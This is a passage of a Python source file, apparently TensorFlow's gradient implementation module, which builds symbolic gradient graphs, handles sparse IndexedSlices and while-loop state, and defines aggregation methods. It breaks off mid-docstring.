7c2bd362e0239fef1f285a3fff450e92b060e4ddeb5c5241204fb77aeaf8dc23
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implements the graph generation for computation of gradients."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import contextlib
import sys
import warnings
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import attr_value_pb2
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_grad # pylint: disable=unused-import
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops # pylint: disable=unused-import
from tensorflow.python.ops import cond_v2_impl
from tensorflow.python.ops import control_flow_grad # pylint: disable=unused-import
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import image_grad # pylint: disable=unused-import
from tensorflow.python.ops import linalg_grad # pylint: disable=unused-import
from tensorflow.python.ops import linalg_ops # pylint: disable=unused-import
from tensorflow.python.ops import logging_ops # pylint: disable=unused-import
from tensorflow.python.ops import manip_grad # pylint: disable=unused-import
from tensorflow.python.ops import math_grad # pylint: disable=unused-import
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_grad # pylint: disable=unused-import
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import spectral_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util.tf_export import tf_export
# This is to avoid a circular dependency with cond_v2_impl.
cond_v2_impl._gradients_impl = sys.modules[__name__] # pylint: disable=protected-access
# Warn the user if we convert a sparse representation to dense with at
# least this number of elements.
_LARGE_SPARSE_NUM_ELEMENTS = 100000000
def _IndexedSlicesToTensor(value, dtype=None, name=None, as_ref=False):
"""Converts an IndexedSlices object `value` to a Tensor.
NOTE(mrry): This function is potentially expensive.
Args:
value: An ops.IndexedSlices object.
dtype: The dtype of the Tensor to be returned.
name: Optional name to use for the returned Tensor.
as_ref: True if a ref is requested.
Returns:
A dense Tensor representing the values in the given IndexedSlices.
Raises:
ValueError: If the IndexedSlices does not have the same dtype.
"""
_ = as_ref
if dtype and not dtype.is_compatible_with(value.dtype):
raise ValueError(
"Tensor conversion requested dtype %s for IndexedSlices with dtype %s" %
(dtype.name, value.dtype.name))
if value.dense_shape is None:
raise ValueError(
"Tensor conversion requested for IndexedSlices without dense_shape: %s"
% str(value))
# TODO(mrry): Consider adding static shape information to
# IndexedSlices, to avoid using numpy here.
if not context.executing_eagerly():
dense_shape_value = tensor_util.constant_value(value.dense_shape)
if dense_shape_value is not None:
num_elements = np.prod(dense_shape_value)
if num_elements >= _LARGE_SPARSE_NUM_ELEMENTS:
warnings.warn(
"Converting sparse IndexedSlices to a dense Tensor with %d "
"elements. This may consume a large amount of memory." %
num_elements)
else:
warnings.warn(
"Converting sparse IndexedSlices to a dense Tensor of unknown shape. "
"This may consume a large amount of memory.")
return math_ops.unsorted_segment_sum(
value.values, value.indices, value.dense_shape[0], name=name)
ops.register_tensor_conversion_function(ops.IndexedSlices,
_IndexedSlicesToTensor)
def _MarkReachedOps(from_ops, reached_ops, func_graphs):
"""Mark all ops reached from "from_ops".
Args:
from_ops: list of Operations.
reached_ops: set of Operations.
func_graphs: list of function._FuncGraphs. This method will traverse through
these functions if they capture from_ops or any reachable ops.
"""
queue = collections.deque()
queue.extend(from_ops)
while queue:
op = queue.popleft()
if op not in reached_ops:
reached_ops.add(op)
for output in op.outputs:
if _IsBackpropagatable(output):
queue.extend(_Consumers(output, func_graphs))
def _PendingCount(to_ops, from_ops, colocate_gradients_with_ops, func_graphs,
xs):
"""Initialize the pending count for ops between two lists of Operations.
'pending_count[op]' indicates the number of backprop inputs
to this operation.
Args:
to_ops: list of Operations.
from_ops: list of Operations.
colocate_gradients_with_ops: Python bool. See docstring of gradients().
func_graphs: list of function._FuncGraphs. This method will traverse through
these functions if they capture from_ops or any reachable ops. This is
useful if to_ops occur in a function and from_ops are in an outer function
or graph.
xs: list of Tensors.
Returns:
A tuple containing: (1) the subset of to_ops reachable from from_ops by a
path of zero or more backpropagatable tensors, (2) a mapping from operation
to the number of backprop inputs to that op, and (3) a ControlFlowState
object which is not None if the ops between from_ops and to_ops contain
control flow loops.
"""
# Mark reachable ops from from_ops.
reached_ops = set()
_MarkReachedOps(from_ops, reached_ops, func_graphs)
# X in reached_ops iff X is reachable from from_ops by a path of zero or more
# backpropagatable tensors.
reachable_to_ops = set(op for op in to_ops if op in reached_ops)
# Mark between ops.
between_ops = set()
between_op_list = []
queue = collections.deque()
queue.extend(to_ops)
while queue:
op = queue.popleft()
# We are interested in this op.
if op in reached_ops:
between_ops.add(op)
between_op_list.append(op)
# Clear the boolean so we won't add the inputs again.
reached_ops.remove(op)
for inp in _Inputs(op, xs):
queue.append(inp.op)
# X in between_ops iff X is on a path of zero or more backpropagatable tensors
# between from_ops and to_ops
# 'loop_state' is None if there are no while loops.
loop_state = control_flow_ops.MaybeCreateControlFlowState(
between_op_list, between_ops, colocate_gradients_with_ops)
# Initialize pending count for between ops.
pending_count = collections.defaultdict(int)
for op in between_op_list:
for x in _Inputs(op, xs):
if x.op in between_ops:
pending_count[x.op] += 1
return reachable_to_ops, pending_count, loop_state
def _AsList(x):
return x if isinstance(x, (list, tuple)) else [x]
def _DefaultGradYs(grad_ys,
ys,
colocate_gradients_with_ops,
gradient_uid="__unsupported__"):
"""Fill in default values for grad_ys.
Args:
grad_ys: List of gradients, can contain None.
ys: List of tensors.
colocate_gradients_with_ops: If True, try colocating gradients with
the corresponding op.
gradient_uid: A unique identifier within the graph indicating
which invocation of gradients is being executed. Used to cluster
ops for compilation.
Returns:
A list of gradients to use, without None.
Raises:
ValueError: If sizes of gradients and inputs don't match
TypeError: If type of any gradient is not valid for its input.
"""
if len(grad_ys) != len(ys):
raise ValueError("Passed %d grad_ys for %d ys" % (len(grad_ys), len(ys)))
grad_ys = ops.convert_n_to_tensor_or_indexed_slices(grad_ys, name="grad_y")
new_grad_ys = []
for i in xrange(len(grad_ys)):
grad_y = grad_ys[i]
y = ys[i]
with _maybe_colocate_with(y.op, gradient_uid, colocate_gradients_with_ops):
if grad_y is None:
if y.dtype.is_complex:
raise TypeError(
"Gradients of complex tensors must set grad_ys (y.dtype = %r)" %
y.dtype)
new_grad_ys.append(
array_ops.fill(
array_ops.shape(y),
constant_op.constant(1, dtype=y.dtype, name="grad_ys_%d" % i)))
continue
if y.dtype.is_floating or y.dtype.is_integer:
if not grad_y.dtype.is_floating and not grad_y.dtype.is_integer:
raise TypeError(
"Gradient type %s generated for real or "
"integer-valued tensor %s with type %s must be "
"real or integer" % (dtypes.as_dtype(grad_y.dtype).name, y,
dtypes.as_dtype(y.dtype).name))
elif y.dtype.is_complex:
if not grad_y.dtype.is_complex:
raise TypeError(
"Gradient type %s generated for complex-valued "
"tensor %s with type %s must be real" % (dtypes.as_dtype(
grad_y.dtype).name, y, dtypes.as_dtype(y.dtype).name))
else:
raise TypeError(
"Tensor %s with type %s must be numeric "
"to obtain a default gradient" % (y, dtypes.as_dtype(y.dtype).name))
# Create a grad_y tensor in the name scope of the gradient.
# Required for TensorArrays to identify which gradient call a
# grad_y value is coming from.
if isinstance(grad_y, ops.IndexedSlices):
new_grad_ys.append(
ops.IndexedSlices(
indices=(array_ops.identity(
grad_y.indices, name="grad_ys_%d_indices" % i)
if isinstance(grad_y.indices, ops.Tensor) else
grad_y.indices),
values=(array_ops.identity(
grad_y.values, name="grad_ys_%d_values" % i) if isinstance(
grad_y.values, ops.Tensor) else grad_y.values),
dense_shape=(array_ops.identity(
grad_y.dense_shape, name="grad_ys_%d_shape" % i)
if isinstance(grad_y.dense_shape, ops.Tensor) else
grad_y.dense_shape)))
else:
new_grad_ys.append(array_ops.identity(grad_y, name="grad_ys_%d" % i))
return new_grad_ys
def _IsTrainable(tensor):
dtype = dtypes.as_dtype(tensor.dtype)
return dtype.base_dtype in (dtypes.float16, dtypes.float32, dtypes.float64,
dtypes.complex64, dtypes.complex128,
dtypes.resource)
def _IsBackpropagatable(tensor):
if _IsTrainable(tensor):
return True
dtype = dtypes.as_dtype(tensor.dtype)
return dtype.base_dtype in (dtypes.bfloat16, dtypes.resource, dtypes.variant)
def _VerifyGeneratedGradients(grads, op):
"""Verify that gradients are valid in number and type.
Args:
grads: List of generated gradients.
    op: Operation for which the gradients were generated.
Raises:
ValueError: if sizes of gradients and inputs don't match.
TypeError: if type of any gradient is not valid for its input.
"""
if len(grads) != len(op.inputs):
raise ValueError("Num gradients %d generated for op %s do not match num "
"inputs %d" % (len(grads), op.node_def, len(op.inputs)))
def _StopOps(from_ops, stop_gradient_ops, pending_count, xs):
"""The set of ops that terminate the gradient computation.
This computes the frontier of the forward graph *before* which backprop
should stop. Operations in the returned set will not be differentiated.
This set is defined as the subset of `from_ops` containing ops that have
no predecessor in `from_ops`. `pending_count` is the result of
  `_PendingCount(to_ops, from_ops, ...)`. An 'op' has predecessors in `from_ops`
iff pending_count[op] > 0.
In addition, none of `stop_gradient_ops` will be differentiated.
Args:
from_ops: list of Operations.
stop_gradient_ops: list of Operations never to backprop through.
pending_count: mapping from operation to number of backprop inputs.
xs: list of Tensors.
Returns:
The set of operations.
"""
stop_ops = set()
for op in from_ops:
is_stop_op = True
for inp in _Inputs(op, xs):
if pending_count[inp.op] > 0:
is_stop_op = False
break
if is_stop_op:
stop_ops.add(op)
stop_ops.update(op for op in stop_gradient_ops)
return stop_ops
@contextlib.contextmanager
def _maybe_colocate_with(op, gradient_uid, colocate_gradients_with_ops): # pylint: disable=invalid-name
"""Context to colocate with `op` if `colocate_gradients_with_ops`."""
if colocate_gradients_with_ops:
with ops._colocate_with_for_gradient(op, gradient_uid): # pylint: disable=protected-access
yield
else:
yield
def _SymGrad(op, out_grads, xs):
"""Backprop through a function call node op given its outputs' gradients."""
f_in = [x for x in _Inputs(op, xs)] + out_grads
f_types = [x.dtype for x in _Inputs(op, xs)]
f = attr_value_pb2.NameAttrList()
f.name = op.type
for k in op.node_def.attr:
f.attr[k].CopyFrom(op.node_def.attr[k])
# TODO(apassos) use a better dtype here
in_grads = functional_ops.symbolic_gradient(
input=f_in,
Tout=[x if x != dtypes.resource else dtypes.float32 for x in f_types],
f=f)
return in_grads
def _MaybeCompile(scope, op, func, grad_fn):
"""Compile the calculation in grad_fn if op was marked as compiled."""
scope = scope.rstrip("/").replace("/", "_")
if func is not None:
xla_compile = func.definition.attr["_XlaCompile"].b
xla_separate_compiled_gradients = func.definition.attr[
"_XlaSeparateCompiledGradients"].b
xla_scope = func.definition.attr["_XlaScope"].s.decode()
else:
try:
xla_compile = op.get_attr("_XlaCompile")
xla_separate_compiled_gradients = op.get_attr(
"_XlaSeparateCompiledGradients")
xla_scope = op.get_attr("_XlaScope").decode()
except ValueError:
return grad_fn() # Exit early
if not xla_compile:
return grad_fn() # Exit early
# If the gradients are supposed to be compiled separately, we give them a
# _XlaScope name that is based on the name_scope of the gradients. Otherwise
# they just inherit the existing _XlaScope name, which lets them be merged
# together with the non-gradient computation.
if xla_separate_compiled_gradients:
xla_grad_scope = "%s_grad_%s" % (xla_scope, scope)
else:
xla_grad_scope = xla_scope
attrs = {
"_XlaCompile": attr_value_pb2.AttrValue(b=xla_compile),
"_XlaScope": attr_value_pb2.AttrValue(s=xla_grad_scope.encode())
}
with ops.get_default_graph()._attr_scope(attrs): # pylint: disable=protected-access
return grad_fn()
def _RaiseNoGradWrtInitialLoopValError(op, from_ops, xs):
"""Raises an error if we backprop through a loop var."""
# Find the nearest 'to_op' reachable from 'op' to provide a more helpful error
# message.
target_op = None
queue = collections.deque([op])
visited = set()
while queue:
curr_op = queue.popleft()
if curr_op in visited: continue
visited.add(curr_op)
if curr_op in from_ops:
target_op = curr_op
break
queue.extend(t.op for t in _Inputs(curr_op, xs))
assert target_op
raise ValueError(
"Cannot compute gradient inside while loop with respect to op '%s'. "
"We do not support taking the gradient wrt or through the initial value "
"of a loop variable. Gradients can be computed through loop invariants "
"or wrt the input parameters to the loop body."
% target_op.name)
def _MaybeCaptured(t):
"""If t is a captured value placeholder, returns the original captured value.
Args:
t: Tensor
Returns:
A tensor, potentially from a different Graph/function._FuncGraph.
"""
# pylint: disable=protected-access
if isinstance(t.op.graph, function._FuncGraph) and t.op.type == "Placeholder":
for input_t, placeholder_t in t.op.graph._captured.items():
if t == placeholder_t:
return _MaybeCaptured(input_t)
# pylint: enable=protected-access
return t
# TODO(skyewm): plumbing xs through everywhere is ugly, consider making
# _GradientsHelper a class with xs as a member variable.
def _Inputs(op, xs):
"""Returns the inputs of op, crossing closure boundaries where necessary.
Args:
op: Operation
xs: list of Tensors we are differentiating w.r.t.
Returns:
A list of tensors. The tensors may be from multiple
Graph/function._FuncGraphs if op is in a function._FuncGraph and has
captured inputs.
"""
if isinstance(op.graph, function._FuncGraph): # pylint: disable=protected-access
# If we're differentiating w.r.t. `t`, do not attempt to traverse through it
# to a captured value. The algorithm needs to "see" `t` in this case, even
# if it's a function input for a captured value, whereas usually we'd like
# to traverse through these closures as if the captured value was the direct
# input to op.
return [t if (t in xs) else _MaybeCaptured(t) for t in op.inputs]
else:
return op.inputs
def _Consumers(t, func_graphs):
"""Returns the consumers of t, crossing closure boundaries where necessary.
Args:
t: Tensor
func_graphs: a list of function._FuncGraphs that may have captured t.
Returns:
A list of tensors. The tensors will be from the current graph and/or
func_graphs.
"""
consumers = t.consumers()
for func in func_graphs:
for input_t, placeholder in func._captured.items(): # pylint: disable=protected-access
if input_t == t:
consumers.extend(_Consumers(placeholder, func_graphs))
return consumers
@tf_export("gradients")
def gradients(ys,
xs,
grad_ys=None,
name="gradients",
colocate_gradients_with_ops=False,
gate_gradients=False,
aggregation_method=None,
stop_gradients=None):
"""Constructs symbolic derivatives of sum of `ys` w.r.t. x in `xs`.
`ys` and `xs` are each a `Tensor` or a list of tensors. `grad_ys`
is a list of `Tensor`, holding the gradients received by the
`ys`. The list must be the same length as `ys`.
`gradients()` adds ops to the graph to output the derivatives of `ys` with
respect to `xs`. It returns a list of `Tensor` of length `len(xs)` where
each tensor is the `sum(dy/dx)` for y in `ys`.
`grad_ys` is a list of tensors of the same length as `ys` that holds
the initial gradients for each y in `ys`. When `grad_ys` is None,
we fill in a tensor of '1's of the shape of y for each y in `ys`. A
user can provide their own initial `grad_ys` to compute the
derivatives using a different initial gradient for each y (e.g., if
one wanted to weight the gradient differently for each value in
each y).
`stop_gradients` is a `Tensor` or a list of tensors to be considered constant
with respect to all `xs`. These tensors will not be backpropagated through,
as though they had been explicitly disconnected using `stop_gradient`. Among
other things, this allows computation of partial derivatives as opposed to
total derivatives. For example:
```python
a = tf.constant(0.)
b = 2 * a
g = tf.gradients(a + b, [a, b], stop_gradients=[a, b])
```
Here the partial derivatives `g` evaluate to `[1.0, 1.0]`, compared to the
total derivatives `tf.gradients(a + b, [a, b])`, which take into account the
influence of `a` on `b` and evaluate to `[3.0, 1.0]`. Note that the above is
equivalent to:
```python
a = tf.stop_gradient(tf.constant(0.))
b = tf.stop_gradient(2 * a)
g = tf.gradients(a + b, [a, b])
```
`stop_gradients` provides a way of stopping gradient after the graph has
already been constructed, as compared to `tf.stop_gradient` which is used
during graph construction. When the two approaches are combined,
backpropagation stops at both `tf.stop_gradient` nodes and nodes in
`stop_gradients`, whichever is encountered first.
All integer tensors are considered constant with respect to all `xs`, as if
they were included in `stop_gradients`.
Args:
ys: A `Tensor` or list of tensors to be differentiated.
xs: A `Tensor` or list of tensors to be used for differentiation.
grad_ys: Optional. A `Tensor` or list of tensors the same size as
`ys` and holding the gradients computed for each y in `ys`.
name: Optional name to use for grouping all the gradient ops together.
defaults to 'gradients'.
colocate_gradients_with_ops: If True, try colocating gradients with
the corresponding op.
gate_gradients: If True, add a tuple around the gradients returned
      for an operation. This avoids some race conditions.
aggregation_method: Specifies the method used to combine gradient terms.
Accepted values are constants defined in the class `AggregationMethod`.
stop_gradients: Optional. A `Tensor` or list of tensors not to differentiate
through.
Returns:
A list of `sum(dy/dx)` for each x in `xs`.
Raises:
LookupError: if one of the operations between `x` and `y` does not
have a registered gradient function.
ValueError: if the arguments are invalid.
RuntimeError: if called in Eager mode.
"""
# Creating the gradient graph for control flow mutates Operations.
# _mutation_lock ensures a Session.run call cannot occur between creating and
# mutating new ops.
with ops.get_default_graph()._mutation_lock(): # pylint: disable=protected-access
return _GradientsHelper(ys, xs, grad_ys, name, colocate_gradients_with_ops,
gate_gradients, aggregation_method, stop_gradients)
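# Illustrative sketch (not from the original docstring; values are
# hypothetical): `grad_ys` lets a caller weight the gradient backpropagated
# from each element of y.
#
#   x = tf.constant([1.0, 2.0])
#   y = 3.0 * x
#   dy = tf.constant([0.1, 10.0])               # per-element initial gradient
#   g, = tf.gradients(y, x, grad_ys=dy)         # evaluates to [0.3, 30.0]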
def _GradientsHelper(ys,
xs,
grad_ys=None,
name="gradients",
colocate_gradients_with_ops=False,
gate_gradients=False,
aggregation_method=None,
stop_gradients=None,
src_graph=None):
"""Implementation of gradients()."""
if context.executing_eagerly():
raise RuntimeError("tf.gradients is not supported when eager execution "
"is enabled. Use tf.GradientTape instead.")
if src_graph is None:
src_graph = ops.get_default_graph()
# If src_graph is a _FuncGraph (i.e. a function body), gather it and all
# ancestor graphs. This is necessary for correctly handling captured values.
func_graphs = []
curr_graph = src_graph
while isinstance(curr_graph, function._FuncGraph): # pylint: disable=protected-access
func_graphs.append(curr_graph)
curr_graph = curr_graph._outer_graph # pylint: disable=protected-access
ys = _AsList(ys)
xs = _AsList(xs)
stop_gradients = [] if stop_gradients is None else _AsList(stop_gradients)
if grad_ys is None:
grad_ys = [None] * len(ys)
else:
grad_ys = _AsList(grad_ys)
with ops.name_scope(
name, "gradients",
list(ys) + list(xs) + list(stop_gradients) + list(grad_ys)) as grad_scope:
# Get a uid for this call to gradients that can be used to help
# cluster ops for compilation.
gradient_uid = ops.get_default_graph().unique_name("uid")
ys = ops.convert_n_to_tensor_or_indexed_slices(ys, name="y")
xs = [
x.handle if resource_variable_ops.is_resource_variable(x) else x
for x in xs
]
xs = ops.internal_convert_n_to_tensor_or_indexed_slices(
xs, name="x", as_ref=True)
grad_ys = _DefaultGradYs(grad_ys, ys, colocate_gradients_with_ops,
gradient_uid)
# The approach we take here is as follows: Create a list of all ops in the
# subgraph between the ys and xs. Visit these ops in reverse order of ids
# to ensure that when we visit an op the gradients w.r.t its outputs have
# been collected. Then aggregate these gradients if needed, call the op's
# gradient function, and add the generated gradients to the gradients for
# its input.
# Initialize the pending count for ops in the connected subgraph from ys
# to the xs.
if len(ys) > 1:
ys = [array_ops.identity(y) if _Consumers(y, func_graphs) else y
for y in ys]
to_ops = [t.op for t in ys]
from_ops = [t.op for t in xs]
stop_gradient_ops = [t.op for t in stop_gradients]
reachable_to_ops, pending_count, loop_state = _PendingCount(
to_ops, from_ops, colocate_gradients_with_ops, func_graphs, xs)
# Iterate over the collected ops.
#
# grads: op => list of gradients received on each output endpoint of the
# op. The gradients for each endpoint are initially collected as a list.
# When it is time to call the op's gradient function, for each endpoint we
# aggregate the list of received gradients into a Add() Operation if there
# is more than one.
grads = {}
# Add the initial gradients for the ys.
for y, grad_y in zip(ys, grad_ys):
_SetGrad(grads, y, grad_y)
# Initialize queue with to_ops.
queue = collections.deque()
# Add the ops in 'to_ops' into the queue.
to_ops_set = set()
for op in to_ops:
# 'ready' handles the case where one output gradient relies on
# another output's gradient.
ready = (pending_count[op] == 0)
if ready and op not in to_ops_set and op in reachable_to_ops:
to_ops_set.add(op)
queue.append(op)
if loop_state:
loop_exits = loop_state.ProcessUnusedLoopExits(pending_count, to_ops_set)
for y in loop_exits:
if _IsTrainable(y):
_SetGrad(grads, y, loop_state.ZerosLikeForExit(y))
queue.append(y.op)
stop_ops = _StopOps(from_ops, stop_gradient_ops, pending_count, xs)
while queue:
# generate gradient subgraph for op.
op = queue.popleft()
with _maybe_colocate_with(op, gradient_uid, colocate_gradients_with_ops):
if loop_state:
loop_state.EnterGradWhileContext(op, before=True)
out_grads = _AggregatedGrads(grads, op, gradient_uid, loop_state,
aggregation_method)
if loop_state:
loop_state.ExitGradWhileContext(op, before=True)
grad_fn = None
func_call = None
# pylint: disable=protected-access
is_func_call = src_graph._is_function(op.type)
# pylint: enable=protected-access
has_out_grads = any(isinstance(g, ops.Tensor) or g for g in out_grads)
if has_out_grads and (op not in stop_ops):
if is_func_call:
func_call = src_graph._get_function(op.type) # pylint: disable=protected-access
# Note that __defun is not set if the graph is
# imported. If it's set, we prefer to access the original
# defun.
func_call = getattr(op, "__defun", func_call)
grad_fn = func_call.python_grad_func
else:
# A grad_fn must be defined, either as a function or as None
# for ops that do not have gradients.
try:
grad_fn = ops.get_gradient_function(op)
except LookupError:
raise LookupError(
"No gradient defined for operation '%s' (op type: %s)" %
(op.name, op.type))
if loop_state:
loop_state.EnterGradWhileContext(op, before=False)
# NOTE(skyewm): We don't support computing gradients wrt a loop variable
# unless it's within the context of a single iteration (i.e. the
# gradient is wrt to the loop parameter in the body function, not wrt or
# through the initial value). This means if we're in a while loop
# context, we should never see a switch node from this context.
# pylint: disable=protected-access
if (control_flow_util.IsSwitch(op) and
op._control_flow_context is not None and
op._control_flow_context.IsWhileContext() and
op._control_flow_context ==
ops.get_default_graph()._get_control_flow_context()):
_RaiseNoGradWrtInitialLoopValError(op, from_ops, xs)
# pylint: enable=protected-access
if (grad_fn or is_func_call) and has_out_grads:
# NOTE: If _AggregatedGrads didn't compute a value for the i'th
# output, it means that the cost does not depend on output[i],
# therefore dC/doutput[i] is 0.
for i, out_grad in enumerate(out_grads):
if (not isinstance(out_grad, ops.Tensor) and not out_grad) and (
(not grad_fn and is_func_call) or _IsTrainable(op.outputs[i])):
# Only trainable outputs or outputs for a function call that
# will use SymbolicGradient get a zero gradient. Gradient
# functions should ignore the gradient for other outputs.
# TODO(apassos) gradients of resource handles might be an
# issue here because of zeros.
if loop_state:
out_grads[i] = loop_state.ZerosLike(op, i)
else:
out_grads[i] = control_flow_ops.ZerosLikeOutsideLoop(op, i)
with ops.name_scope(op.name + "_grad"):
# pylint: disable=protected-access
with src_graph._original_op(op):
# pylint: enable=protected-access
if grad_fn:
# If grad_fn was found, do not use SymbolicGradient even for
# functions.
in_grads = _MaybeCompile(grad_scope, op, func_call,
lambda: grad_fn(op, *out_grads))
else:
# For function call ops, we add a 'SymbolicGradient'
# node to the graph to compute gradients.
in_grads = _MaybeCompile(grad_scope, op, func_call,
lambda: _SymGrad(op, out_grads, xs))
in_grads = _AsList(in_grads)
_VerifyGeneratedGradients(in_grads, op)
if gate_gradients and len([x for x in in_grads
if x is not None]) > 1:
with ops.device(None):
with ops._colocate_with_for_gradient( # pylint: disable=protected-access
None,
gradient_uid,
ignore_existing=True):
in_grads = control_flow_ops.tuple(in_grads)
_LogOpGradients(op, out_grads, in_grads)
else:
# If no grad_fn is defined or none of out_grads is available,
# just propagate a list of None backwards.
in_grads = [None] * len(_Inputs(op, xs))
for i, (t_in, in_grad) in enumerate(zip(_Inputs(op, xs), in_grads)):
if in_grad is not None:
if (isinstance(in_grad, ops.Tensor) and
t_in.dtype != dtypes.resource):
try:
in_grad.set_shape(t_in.get_shape())
except ValueError:
raise ValueError(
"Incompatible shapes between op input and calculated "
"input gradient. Forward operation: %s. Input index: %d. "
"Original input shape: %s. "
"Calculated input gradient shape: %s" %
(op.name, i, t_in.shape, in_grad.shape))
_SetGrad(grads, t_in, in_grad)
if loop_state:
loop_state.ExitGradWhileContext(op, before=False)
# Update pending count for the inputs of op and enqueue ready ops.
_UpdatePendingAndEnqueueReady(grads, op, queue, pending_count, loop_state,
xs)
if loop_state:
loop_state.PostProcessing()
return [_GetGrad(grads, x) for x in xs]
def _HasAnyNotNoneGrads(grads, op):
"""Return true iff op has real gradient."""
out_grads = _GetGrads(grads, op)
for out_grad in out_grads:
if isinstance(out_grad, (ops.Tensor, ops.IndexedSlices)):
return True
if out_grad and isinstance(out_grad, collections.Sequence):
if any([g is not None for g in out_grad]):
return True
return False
def _UpdatePendingAndEnqueueReady(grads, op, queue, pending_count, loop_state,
xs):
"""Update pending count for the inputs of op and enqueue ready ops."""
for x in _Inputs(op, xs):
pending_count[x.op] -= 1
ready = (pending_count[x.op] == 0)
if loop_state and not ready:
ready = pending_count[x.op] > 0 and control_flow_util.IsLoopSwitch(x.op)
if ready:
if control_flow_util.IsLoopExit(x.op):
        # If x is an exit without a real gradient, defer processing it.
grad_state = loop_state.GetGradState(x.op, before=False)
grad_state.deferred_exits.append(x)
grad_state.pending_exits_count -= 1
if grad_state.pending_exits_count == 0:
# We now have all the exits so process them.
has_not_none_grad = False
for y in grad_state.deferred_exits:
if _HasAnyNotNoneGrads(grads, y.op):
has_not_none_grad = True
queue.append(y.op)
else:
grad_state.unused_exits.append(y)
if has_not_none_grad:
# For an unused exit, if it has trainable outputs, backprop
# a zero gradient. Otherwise, just ignore it.
for y in grad_state.unused_exits:
if _IsTrainable(y):
_SetGrad(grads, y, loop_state.ZerosLikeForExit(y))
queue.append(y.op)
else:
# All exits are "unused" so use None as gradient.
for y in grad_state.unused_exits:
queue.append(y.op)
else:
queue.append(x.op)
def _SetGrad(grads, t, grad):
"""Sets gradient "grad" in "grads" for tensor "t"."""
op = t.op
op_grads = grads.get(op)
if not op_grads:
op_grads = [[] for _ in xrange(len(op.outputs))]
grads[op] = op_grads
t_grads = op_grads[t.value_index]
if isinstance(t_grads, list):
t_grads.append(grad)
else:
assert control_flow_util.IsLoopSwitch(op)
op_grads[t.value_index] = grad
def _GetGrad(grads, t):
"""Gets gradient for tensor "t"."""
op = t.op
op_grads = grads.get(op)
if not op_grads:
return None
t_grad = op_grads[t.value_index]
assert not isinstance(
t_grad, list), ("gradients list should have been aggregated by now.")
return t_grad
def _GetGrads(grads, op):
"""Gets all gradients for op."""
if op in grads:
return grads[op]
else:
return [[] for _ in xrange(len(op.outputs))]
def _HandleNestedIndexedSlices(grad):
assert isinstance(grad, ops.IndexedSlices)
if isinstance(grad.values, ops.Tensor):
return grad
else:
assert isinstance(grad.values, ops.IndexedSlices)
g = _HandleNestedIndexedSlices(grad.values)
return ops.IndexedSlices(g.values, array_ops.gather(
grad.indices, g.indices), g.dense_shape)
def _AccumulatorShape(inputs):
shape = tensor_shape.unknown_shape()
for i in inputs:
if isinstance(i, ops.Tensor):
shape = shape.merge_with(i.get_shape())
return shape
def _LogOpGradients(op, out_grads, in_grads):
"""Log the in and out grads of an op."""
logging.vlog(1, "Gradient for '" + op.name + "'")
def _FilterGrad(x):
if x is None:
return False
if isinstance(x, (list, tuple)):
return bool(x)
else:
return True
logging.vlog(1, " in --> %s",
", ".join([x.name for x in out_grads if _FilterGrad(x)]))
logging.vlog(1, " out --> %s",
", ".join([x.name for x in in_grads if _FilterGrad(x)]))
def _MultiDeviceAddN(tensor_list, gradient_uid):
"""Adds tensors from potentially multiple devices."""
# Basic function structure comes from control_flow_ops.group().
# Sort tensors according to their devices.
tensors_on_device = collections.defaultdict(lambda: [])
for tensor in tensor_list:
tensors_on_device[tensor.device].append(tensor)
# For each device, add the tensors on that device first.
# Then gather the partial sums from multiple devices.
# TODO(sjhwang): Create hierarchical aggregation tree as pbar's suggestion.
# E.g., aggregate per GPU, then per task, and so on.
summands = []
def DeviceKey(dev):
return "" if dev is None else dev
for dev in sorted(six.iterkeys(tensors_on_device), key=DeviceKey):
tensors = tensors_on_device[dev]
with ops._colocate_with_for_gradient( # pylint: disable=protected-access
tensors[0].op,
gradient_uid,
ignore_existing=True):
summands.append(math_ops.add_n(tensors))
return math_ops.add_n(summands)
@tf_export("AggregationMethod")
class AggregationMethod(object):
"""A class listing aggregation methods used to combine gradients.
Computing partial derivatives can require aggregating gradient
contributions. This class lists the various methods that can
be used to combine gradients in the graph:
* `ADD_N`: All of the gradient terms are summed as part of one
operation using the "AddN" op. It has the property that all
gradients must be ready before any aggregation is performed.
* `DEFAULT`: The system-chosen default aggregation method.
"""
ADD_N = 0
DEFAULT = ADD_N
# The following are experimental and may not be supported in future releases.
EXPERIMENTAL_TREE = 1
EXPERIMENTAL_ACCUMULATE_N = 2
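# Illustrative sketch (hypothetical values): choosing how gradient
# contributions are combined when a tensor is reached along several paths.
#
#   x = tf.constant(2.0)
#   y = x * x + 3.0 * x                          # x receives several contributions
#   g, = tf.gradients(y, x,
#                     aggregation_method=tf.AggregationMethod.EXPERIMENTAL_TREE)
#   # g evaluates to 2*x + 3 = 7.0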
def _AggregatedGrads(grads,
op,
gradient_uid,
loop_state,
aggregation_method=None):
"""Get the aggregated gradients for op.
Args:
grads: The map of memoized gradients.
op: The op to get gradients for.
gradient_uid: A unique identifier within the graph indicating
which invocation of gradients is being executed. Used to cluster
ops for compilation.
loop_state: An object for maintaining the state of the while loops in the
graph. It is of type ControlFlowState. None if the graph
contains no while loops.
aggregation_method: Specifies the method used to combine gradient terms.
Accepted values are constants defined in the class `AggregationMethod`.
Returns:
    A list of gradients, one for each output of `op`. If the gradient
    for a particular output is a list, this function aggregates it
before returning.
Raises:
TypeError: if the incoming grads are not Tensors or IndexedSlices.
